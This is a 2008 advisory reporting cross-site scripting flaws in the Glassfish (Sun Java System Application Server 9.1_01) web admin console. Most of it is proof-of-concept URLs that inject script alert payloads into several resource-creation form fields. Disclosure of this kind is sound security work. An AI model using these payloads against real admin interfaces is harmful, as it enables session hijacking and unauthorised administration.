============================== Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) ) ============================== Author: Eduardo Neves a.k.a _eth0_ Date: 14 june 2008 Site: http://webappsecurity.wordpress.com ============================== APPLICATION : Glassfish webadmin interface VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs) VENDOR : http://www.sun.com DOWNLOAD : https://glassfish.dev.java.net/ ============================== IMPACT: XSS, XSRF, etc. Severity: Low (or not?) ============================== Descrition: This vulnerability affect some webpages in the glassfish webadmin interface, that vulnerability allow user can insert a malicious or a not expected input data in the input type field.That was found in 10+ input data field in glassfish. This is a vulnerable URL: http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage %3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3A propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2 7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet% 3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B% 3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresou rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_ id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr opertyContentPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPag e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27 xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3 ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28% 27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet %3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27 xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3 ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3 C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage% 3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&j avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aprop ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyShee t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm %3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2 8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTex tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3 Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&p ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm _hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_ focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType =javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true& propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3 A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons% http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aproper tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyF orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc= <script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTex tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew. html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_i d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte ntPage%3AtopButtons%3AnewButton http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<scri pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</scrip t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField% 3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apro pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script> &propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPa ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules. html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_i d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte ntPage%3AbottomButtons%3AsaveButton2 http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyConten tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xs s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3Apr opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>a lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&proper tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_w ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu ttons%3AnextButton And others =) -- |_|0|_| Serrano Neves - a.k.a eth0 |_|_|0| http://webappsecurity.wordpress.com |0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds
